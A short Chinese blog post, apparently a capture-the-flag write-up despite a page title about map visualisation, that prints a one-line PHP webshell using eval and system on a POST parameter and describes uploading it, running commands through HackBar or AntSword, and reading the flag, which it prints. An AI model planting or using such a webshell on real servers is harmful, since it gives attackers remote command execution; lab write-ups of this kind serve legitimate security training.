0
点赞
收藏
分享

微信扫一扫

数据可视化-地图可视化-Python

Java架构领域 2024-04-07 阅读 19
网络安全

构造一句话PHP木马

<?php @eval(system($_POST['shell'])); ?>

利用eval函数解析$shell的值使得服务器执行system命令

eval函数是无法直接执行命令的,只能把字符串当作php代码解析

这里我们构造的木马是POST的方式上传,那就用MaxHacKBar来执行

创建好的木马上传后记下这个路径:


 点击"Load URL"并且把刚才我们上传的文件路径粘贴到后面

接下来把我们要执行的命令以POST的方式赋值给shell就可以命令执行了

最后也是在根目录下找到了flag

cat一下flag


经测试这里发现直接用一句话木马,用蚁剑连接也是可以成功的

 

也是可以在根目录找到flag

 


flag{f0884217-495e-4d3f-b825-2f3b55a223a2}

举报

相关推荐

0 条评论